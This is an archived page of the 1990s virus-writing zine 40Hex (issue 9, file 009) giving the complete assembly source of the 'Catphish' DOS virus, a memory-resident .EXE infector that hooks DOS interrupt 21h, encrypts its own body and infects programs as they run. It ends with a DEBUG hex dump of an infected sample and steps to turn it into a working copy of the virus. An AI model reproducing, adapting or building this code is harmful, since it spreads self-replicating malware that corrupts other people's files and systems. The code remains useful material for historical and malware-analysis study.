Copy Link
Add to Bookmark
Report

40Hex Issue 09 File 009

eZine's profile picture
Published in 
40Hex
 · 4 months ago

40Hex Number 9 Volume 2 Issue 5                                       File 009 

name CATPHISH
title
code segment
assume cs:code, ds:code, es:code
org 100h

;-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
; FirstStrike presents:
;
; The Catphish Virus.
;
; The Catphish virus is a resident .EXE infector.
; Size: 701 bytes (decimal).
; No activation (bomb).
; Saves date and file attributes.
;
; If assembling, check_if_resident jump must be marked over
; with nop after first execution (first execution will hang
; system).
;
; *** Source is made available to learn from, not to
; change author's name and claim credit! ***

start:
call setup ; Find "delta offset".
setup:
pop bp
sub bp, offset setup-100h
jmp check_if_resident ; See note above about jmp!

pre_dec_em:
mov bx,offset infect_header-100h
add bx,bp
mov cx,endcrypt-infect_header

ror_em:
mov dl,byte ptr cs:[bx]
ror dl,1 ; Decrypt virus code
mov byte ptr cs:[bx],dl ; by rotating right.
inc bx
loop ror_em

jmp check_if_resident

;--------------------------------- Infect .EXE header -----------------------
; The .EXE header modifying code below is my reworked version of
; Dark Angel's code found in his Phalcon/Skism virus guides.


infect_header:
push bx
push dx
push ax



mov bx, word ptr [buffer+8-100h] ; Header size in paragraphs
; ^---make sure you don't destroy the file handle
mov cl, 4 ; Multiply by 16. Won't
shl bx, cl ; work with headers > 4096
; bytes. Oh well!
sub ax, bx ; Subtract header size from
sbb dx, 0 ; file size
; Now DX:AX is loaded with file size minus header size
mov cx, 10h ; DX:AX/CX = AX Remainder DX
div cx


mov word ptr [buffer+14h-100h], dx ; IP Offset
mov word ptr [buffer+16h-100h], ax ; CS Displacement in module


mov word ptr [buffer+0Eh-100h], ax ; Paragraph disp. SS
mov word ptr [buffer+10h-100h], 0A000h ; Starting SP

pop ax
pop dx

add ax, endcode-start ; add virus size
cmp ax, endcode-start
jb fix_fault
jmp execont


war_cry db 'Cry Havoc, and let slip the Dogs of War!',0
v_name db '[Catphish]',0 ; Virus name.
v_author db 'FirstStrike',0 ; Me.
v_stuff db 'Kraft!',0


fix_fault:
add dx,1d

execont:
push ax
mov cl, 9
shr ax, cl
ror dx, cl
stc

adc dx, ax
pop ax
and ah, 1


mov word ptr [buffer+4-100h], dx ; Fix-up the file size in
mov word ptr [buffer+2-100h], ax ; the EXE header.

pop bx
retn ; Leave subroutine

;----------------------------------------------------------------------------


check_if_resident:
push es
xor ax,ax
mov es,ax

cmp word ptr es:[63h*4],0040h ; Check to see if virus
jnz grab_da_vectors ; is already resident
jmp exit_normal ; by looking for a 40h
; signature in the int 63h
; offset section of
; interrupt table.

grab_da_vectors:

mov ax,3521h ; Store original int 21h
int 21h ; vector pointer.
mov word ptr cs:[bp+dos_vector-100h],bx
mov word ptr cs:[bp+dos_vector+2-100h],es



load_high:
push ds

find_chain: ; Load high routine that
; uses the DOS internal
mov ah,52h ; table function to find
int 21h ; start of MCB and then
; scales up chain to
mov ds,es: word ptr [bx-2] ; find top. (The code
assume ds:nothing ; is long, but it is the
; only code that would
xor si,si ; work when an infected
; .EXE was to be loaded
Middle_check: ; into memory.

cmp byte ptr ds:[0],'M'
jne Check4last

add_one:
mov ax,ds
add ax,ds:[3]
inc ax

mov ds,ax
jmp Middle_check

Check4last:
cmp byte ptr ds:[0],'Z'
jne Error
mov byte ptr ds:[0],'M'
sub word ptr ds:[3],(endcode-start+15h)/16h+1
jmp add_one

error:
mov byte ptr ds:[0],'Z'
mov word ptr ds:[1],008h
mov word ptr ds:[3],(endcode-start+15h)/16h+1

push ds
pop ax
inc ax
push ax
pop es





move_virus_loop:
mov bx,offset start-100h ; Move virus into carved
add bx,bp ; out location in memory.
mov cx,endcode-start
push bp
mov bp,0000h

move_it:
mov dl, byte ptr cs:[bx]
mov byte ptr es:[bp],dl
inc bp
inc bx
loop move_it
pop bp



hook_vectors:

mov ax,2563h ; Hook the int 21h vector
mov dx,0040h ; which means it will
int 21h ; point to virus code in
; memory.
mov ax,2521h
mov dx,offset virus_attack-100h
push es
pop ds
int 21h




pop ds



exit_normal: ; Return control to
pop es ; infected .EXE
mov ax, es ; (Dark Angle code.)
add ax, 10h
add word ptr cs:[bp+OrigCSIP+2-100h], ax

cli
add ax, word ptr cs:[bp+OrigSSSP+2-100h]
mov ss, ax
mov sp, word ptr cs:[bp+OrigSSSP-100h]
sti

xor ax,ax
xor bp,bp

endcrypt label byte

db 0eah
OrigCSIP dd 0fff00000h
OrigSSSP dd ?

exe_attrib dw ?
date_stamp dw ?
time_stamp dw ?



dos_vector dd ?

buffer db 18h dup(?) ; .EXE header buffer.




;----------------------------------------------------------------------------


virus_attack proc far
assume cs:code,ds:nothing, es:nothing


cmp ax,4b00h ; Infect only on file
jz run_kill ; executions.

leave_virus:
jmp dword ptr cs:[dos_vector-100h]



run_kill:
call infectexe
jmp leave_virus





infectexe: ; Same old working horse
push ax ; routine that infects
push bx ; the selected file.
push cx
push es
push dx
push ds



mov cx,64d
mov bx,dx

findname:
cmp byte ptr ds:[bx],'.'
jz o_k
inc bx
loop findname

pre_get_out:
jmp get_out

o_k:
cmp byte ptr ds:[bx+1],'E' ; Searches for victims.
jnz pre_get_out
cmp byte ptr ds:[bx+2],'X'
jnz pre_get_out
cmp byte ptr ds:[bx+3],'E'
jnz pre_get_out




getexe:
mov ax,4300h
call dosit

mov word ptr cs:[exe_attrib-100h],cx

mov ax,4301h
xor cx,cx
call dosit

exe_kill:
mov ax,3d02h
call dosit
xchg bx,ax

mov ax,5700h
call dosit

mov word ptr cs:[time_stamp-100h],cx
mov word ptr cs:[date_stamp-100h],dx



push cs
pop ds

mov ah,3fh
mov cx,18h
mov dx,offset buffer-100h
call dosit

cmp word ptr cs:[buffer+12h-100h],1993h ; Looks for virus marker
jnz infectforsure ; of 1993h in .EXE
jmp close_it ; header checksum
; position.
infectforsure:
call move_f_ptrfar

push ax
push dx


call store_header

pop dx
pop ax

call infect_header


push bx
push cx
push dx


mov bx,offset infect_header-100h
mov cx,(endcrypt)-(infect_header)

rol_em: ; Encryption via
mov dl,byte ptr cs:[bx] ; rotating left.
rol dl,1
mov byte ptr cs:[bx],dl
inc bx
loop rol_em

pop dx
pop cx
pop bx

mov ah,40h
mov cx,endcode-start
mov dx,offset start-100h
call dosit

push bx
push cx
push dx


pre_dec_em2:
mov bx,offset infect_header-100h
mov cx,endcrypt-infect_header

ror_em2:
mov dl,byte ptr cs:[bx]
ror dl,1 ; Decrypt virus code
mov byte ptr cs:[bx],dl ; by rotating right.
inc bx
loop ror_em2

pop dx
pop cx
pop bx


mov word ptr cs:[buffer+12h-100h],1993h


call move_f_ptrclose

mov ah,40h
mov cx,18h
mov dx,offset buffer-100h
call dosit

mov ax,5701h
mov cx,word ptr cs:[time_stamp-100h]
mov dx,word ptr cs:[date_stamp-100h]
call dosit

close_it:


mov ah,3eh
call dosit

get_out:


pop ds
pop dx

set_attrib:
mov ax,4301h
mov cx,word ptr cs:[exe_attrib-100h]
call dosit


pop es
pop cx
pop bx
pop ax

retn

;---------------------------------- Call to DOS int 21h ---------------------

dosit: ; DOS function call code.
pushf
call dword ptr cs:[dos_vector-100h]
retn

;----------------------------------------------------------------------------










;-------------------------------- Store Header -----------------------------

store_header:
les ax, dword ptr [buffer+14h-100h] ; Save old entry point
mov word ptr [OrigCSIP-100h], ax
mov word ptr [OrigCSIP+2-100h], es

les ax, dword ptr [buffer+0Eh-100h] ; Save old stack
mov word ptr [OrigSSSP-100h], es
mov word ptr [OrigSSSP+2-100h], ax

retn

;---------------------------------------------------------------------------






;---------------------------------- Set file pointer ------------------------

move_f_ptrfar: ; Code to move file pointer.
mov ax,4202h
jmp short move_f

move_f_ptrclose:
mov ax,4200h

move_f:
xor dx,dx
xor cx,cx
call dosit
retn

;----------------------------------------------------------------------------


endcode label byte

endp

code ends
end start




>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

Below is a sample file that is already infected.
Just cut out code and run through debug. Next rename
DUMMY.FIL to DUMMY.EXE and you have a working copy of
your very own Catphish virus.

N DUMMY.FIL
E 0100 4D 5A F4 00 04 00 00 00 20 00 00 00 FF FF 23 00
E 0110 00 A0 93 19 07 00 23 00 3E 00 00 00 01 00 FB 30
E 0120 6A 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 03E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 03F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 04F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0500 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
E 0510 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
E 0520 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
E 0530 90 90 B8 00 4C CD 21 E8 00 00 5D 81 ED 03 00 90
E 0540 90 90 BB 21 00 03 DD B9 41 01 2E 8A 17 D0 CA 2E
E 0550 88 17 43 E2 F5 E9 93 00 A6 A4 A0 17 3C FA 02 63
E 0560 08 A7 C7 56 87 07 B5 00 73 20 00 EF E3 13 2C 13
E 0570 02 47 17 02 47 07 02 8F 0C 0B 02 00 41 B0 B4 0A
E 0580 7B 04 7A 7B 04 E4 94 D7 96 21 86 E4 F2 40 90 C2
E 0590 EC DE C6 58 40 C2 DC C8 40 D8 CA E8 40 E6 D8 D2
E 05A0 E0 40 E8 D0 CA 40 88 DE CE E6 40 DE CC 40 AE C2
E 05B0 E4 42 00 B6 86 C2 E8 E0 D0 D2 E6 D0 BA 00 8C D2
E 05C0 E4 E6 E8 A6 E8 E4 D2 D6 CA 00 96 E4 C2 CC E8 42
E 05D0 00 07 85 02 A0 63 12 A7 D1 A7 95 F3 26 A1 B0 01
E 05E0 C9 02 13 2C F2 02 47 EE 02 B6 87 0C 66 81 1D 81
E 05F0 4C 07 7C 19 02 80 EA 06 D3 03 00 71 42 6A 9B 42
E 0600 5C 13 3D E2 02 5C 19 0D E6 02 3C 69 A4 9B 42 4C
E 0610 1D BE FD 66 ED 01 7C 00 00 9A EA 16 19 B1 06 0C
E 0620 06 00 80 1D B1 D7 DD 01 7C 00 00 B4 EA 1A 8D 0C
E 0630 00 00 9A 07 5C 06 00 42 21 D7 C3 8D 0C 00 00 B4
E 0640 8F 0C 02 00 10 00 8F 0C 06 00 42 00 3C B0 80 A0
E 0650 0E 77 00 00 06 BB 73 7B 04 AA 7B 00 00 5C 15 2E
E 0660 4C 11 AC 00 8A 86 C5 EB BA 71 C6 4A 75 80 00 9B
E 0670 42 71 42 4A 75 1B 02 0C 3E 9B 42 3E 0E 19 81 0A
E 0680 20 00 5C 02 0D CA 02 F5 5C 06 0D D2 02 1D A1 5C
E 0690 17 4D CE 02 F7 66 81 66 DB EA 00 01 10 00 00 01
E 06A0 00 00 20 00 21 1A A5 9D 9E 10 1C 01 4D 5A F4 00
E 06B0 04 00 00 00 20 00 00 00 FF FF 23 00 00 A0 00 00
E 06C0 07 00 23 00 3D 00 4B 74 05 2E FF 2E 71 01 E8 02
E 06D0 00 EB F6 50 53 51 06 52 1E B9 40 00 8B DA 80 3F
E 06E0 2E 74 06 43 E2 F8 E9 C5 00 80 7F 01 45 75 F7 80
E 06F0 7F 02 58 75 F1 80 7F 03 45 75 EB B8 00 43 E8 BF
E 0700 00 2E 89 0E 6B 01 B8 01 43 33 C9 E8 B2 00 B8 02
E 0710 3D E8 AC 00 93 B8 00 57 E8 A5 00 2E 89 0E 6F 01
E 0720 2E 89 16 6D 01 0E 1F B4 3F B9 18 00 BA 75 01 E8
E 0730 8E 00 2E 81 3E 87 01 93 19 75 03 EB 6C 90 E8 A3
E 0740 00 50 52 E8 81 00 5A 58 E8 0D FE 53 51 52 BB 21
E 0750 00 B9 41 01 2E 8A 17 D0 C2 2E 88 17 43 E2 F5 5A
E 0760 59 5B B4 40 B9 BD 02 BA 00 00 E8 53 00 53 51 52
E 0770 BB 21 00 B9 41 01 2E 8A 17 D0 CA 2E 88 17 43 E2
E 0780 F5 5A 59 5B 2E C7 06 87 01 93 19 E8 5B 00 B4 40
E 0790 B9 18 00 BA 75 01 E8 27 00 B8 01 57 2E 8B 0E 6F
E 07A0 01 2E 8B 16 6D 01 E8 17 00 B4 3E E8 12 00 1F 5A
E 07B0 B8 01 43 2E 8B 0E 6B 01 E8 05 00 07 59 5B 58 C3
E 07C0 9C 2E FF 1E 71 01 C3 2E C4 06 89 01 2E A3 63 01
E 07D0 2E 8C 06 65 01 2E C4 06 83 01 2E 8C 06 67 01 2E
E 07E0 A3 69 01 C3 B8 02 42 EB 03 B8 00 42 33 D2 33 C9
E 07F0 E8 CD FF C3
RCX
06F4
W
Q



-+- FirstStrike -+-

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT